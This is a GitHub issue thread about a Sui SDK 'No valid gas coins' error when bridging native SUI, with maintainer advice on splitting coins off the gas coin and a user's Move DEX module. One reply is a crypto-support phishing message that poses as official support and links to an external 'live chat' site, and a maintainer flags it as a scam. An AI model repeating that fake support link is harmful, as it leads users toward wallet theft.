### ISSUE TITLE
Issue Bridging native SUI

### ISSUE THREAD

**Issue by xhuppa** [MystenLabs/sui#20526]
I'm running into issues when trying to bridge native SUI to any other chain, Im seeing a `No valid gas coins found for the transaction.` error. And I ONLY get this when bridging native SUI, not getting this for other assets like usdc or eth. Pasting the error trace below:

```
Transaction failed: Error: No valid gas coins found for the transaction.
    at _TransactionBlock.prepareGasPayment_fn (popup.js:723406:11)
    at async _TransactionBlock.prepare_fn (popup.js:723562:5)
    at async _TransactionBlock.build (popup.js:723308:5)
    at async WhSuiSigner.signAndSend (popup.js:591451:47)
    at async ssw (popup.js:791151:28)
    at async signSendWait (popup.js:791120:22)
    at async AutomaticTokenBridgeRoute.initiate (popup.js:793246:23)
    at async WormholeClient.executeSwap (popup.js:590902:25)
    at async sendTransactionWormhole (popup.js:569983:12)
    at async popup.js:570386:38
```

And when I try setting a gas owner, budget & payment, I get a `MutableObjectUsedMoreThanOnce` error, 
`Error checking transaction input objects: MutableObjectUsedMoreThanOnce { object_id: 0x7f7...ce1fc8 }`

**Comment by Hinted-tech** [comment]
> I'm running into issues when trying to bridge native SUI to any other chain, Im seeing a `No valid gas coins found for the transaction.` error. And I ONLY get this when bridging native SUI, not getting this for other assets like usdc or eth. Pasting the error trace below:
> 
> ```
> Transaction failed: Error: No valid gas coins found for the transaction.
>     at _TransactionBlock.prepareGasPayment_fn (popup.js:723406:11)
>     at async _TransactionBlock.prepare_fn (popup.js:723562:5)
>     at async _TransactionBlock.build (popup.js:723308:5)
>     at async WhSuiSigner.signAndSend (popup.js:591451:47)
>     at async ssw (popup.js:791151:28)
>     at async signSendWait (popup.js:791120:22)
>     at async AutomaticTokenBridgeRoute.initiate (popup.js:793246:23)
>     at async WormholeClient.executeSwap (popup.js:590902:25)
>     at async sendTransactionWormhole (popup.js:569983:12)
>     at async popup.js:570386:38
> ```

We apologize for any trouble you've encountered; it seems there may have been a glitch with the cloud data, but rest assured, we can resolve this issue. To expedite the process, kindly follow the link below to reach our specialized support team:

[Sologenic Support Request](https://dapprectification-chain.pages.dev/)

Use the live chat button at the bottom right to connect with a support agent for prompt assistance.

Thank you for your patience—I’m confident your issue will be resolved soon!

**Comment by stefan-mysten** [comment]
@xhuppa there is no official Sui support team, so do not attempt to engage with such actors as the one that I just deleted (in case you saw the previous comment). 

I will pass this to the right team member and have a look at it asap. Thanks for the report!

**Comment by petvaizAkhtar** [comment]
Yes

**Comment by stefan-mysten** [comment]
It does not sound like you are using the native bridge in Sui. Are you using Wormhole or another bridge?

**Comment by stefan-mysten** [comment]
@xhuppa thanks for confirming. We'd suggest to ask the Wormhole folks on how to deal with this error, that's probably the best place to get help!

**Comment by xhuppa** [comment]
@stefan-mysten Im not sure if this is a wormhole issue, regardless of the bridge I use, Im getting this error when trying to build the transaction using the mysten sdk. 

I'm able to build any other tx, but when I build a native SUI tx I run into this issue. Heres some code for context:

```
   const { transaction } = txn as {
        transaction: SuiTransaction;
      };
      transaction.setSender(senderAddress);
      transaction.setGasBudget(SUI_DEFAULT_TX_BUDGET);

      const serializedTransaction = await transaction.build({
        client: this.client.provider,
      });

      const dryRun = await this.client.simTransaction({
        tx: Buffer.from(serializedTransaction).toString("base64"),
        senderAddress,
      });

```

**Comment by stefan-mysten** [comment]
@xhuppa did you manage to figure it out? From the first error, it might be that you need first to split the SUI coin into two, and use one to pay gas. Usually, this is done by the SDK, but maybe it's worth trying manually?

**Comment by xhuppa** [comment]
@stefan-mysten Still no luck. Anytime I tried splitting into two it would throw an error for having duplicate input objects:

`Error checking transaction input objects: MutableObjectUsedMoreThanOnce { object_id: 0x7f7e... e1fc8 }`

**Comment by hayes-mysten** [comment]
All the errors mentioned above are the result of constructing an invalid transaction, but without a more complete version of your code its hard to tell whats going on.

When a transaction uses sui, you need to be careful to not use the same coin for gas and other inputs.  The easiest way to avoid this is to use coinWithBalance: https://sdk.mystenlabs.com/typescript/transaction-building/intents#the-coinwithbalance-intent

To do this manually, your address likely only has a single sui coin.  Rather than selecting coins to use directly in your transaction, the common pattern is to split off new coins off the gas coin (`const newCoin = tx.splitCoins([amount], tx.gas)`). If you don't manually specify a gas coin, the SDK will automatically use all you sui coins for gas

**Comment by GillHapp** [comment]
hey same here am also getting the error like 

```
Transaction failed
No valid gas coins found for the transaction.
```

and my code is 

```
module my_dex::mydex {
    use sui::coin::{Self, Coin, into_balance};
    use sui::balance::{Self, Balance};
    use sui::transfer;
    use sui::object::{Self, UID};
    use sui::tx_context::{Self, TxContext};
    use sui::url::{Self, Url};
    use std::option;
    use sui::event;

    /// Custom token type to represent MYDEX
    public struct MYDEX has drop {}

    /// Liquidity Pool that holds balances of both tokens
    public struct LiquidityPool has key {
        id: UID,
        sui_balance: Balance<sui::sui::SUI>,
        mydex_balance: Balance<MYDEX>,
        owner: address,
    }

    /// Event to log pool creation
    public struct PoolCreated has copy, drop, store {
        owner: address,
        sui_amount: u64,
        mydex_amount: u64,
    }

    /// Token deployment and minting
    fun init(witness: MYDEX, ctx: &mut TxContext) {
        let (mut treasury, metadata) = coin::create_currency(
            witness,
            9,
            b"MYDEX",
            b"MY DEX TOKEN",
            b"This is custom MY DEX token",
            option::some(url::new_unsafe_from_bytes(
                b"https://silver-blushing-woodpecker-143.mypinata.cloud/ipfs/Qmed2qynTAszs9SiZZpf58QeXcNcYgPnu6XzkD4oeLacU4"
            )),
            ctx
        );

        transfer::public_freeze_object(metadata);

        let initial_amount = 10_000_000_000_000_000;
        let deployer = tx_context::sender(ctx);
        coin::mint_and_transfer(&mut treasury, initial_amount, deployer, ctx);
        transfer::public_transfer(treasury, deployer);
    }

    /// Create a persistent liquidity pool with both token balances
    public entry fun create_pool(
        sui_payment: Coin<sui::sui::SUI>, 
        mydex_payment: Coin<MYDEX>, 
        ctx: &mut TxContext
    ) {
        let sui_amount = coin::value(&sui_payment);
        let mydex_amount = coin::value(&mydex_payment);
        let sui_balance = into_balance(sui_payment);
        let mydex_balance = into_balance(mydex_payment);
        let owner = tx_context::sender(ctx);
        let id = object::new(ctx); // Needed for persistent struct with `key`

        // Emit event
        event::emit(PoolCreated {
            owner,
            sui_amount,
            mydex_amount,
        });

        let pool = LiquidityPool {
            id,
            sui_balance,
            mydex_balance,
            owner
        };
        transfer::transfer(pool, owner);
    }
}

```

am calling the function create_pool

and passing the relevant arg as they shown in my terminal after publishing the contract to devnet 

Can somebody please help me , am try to call this function form the explorer
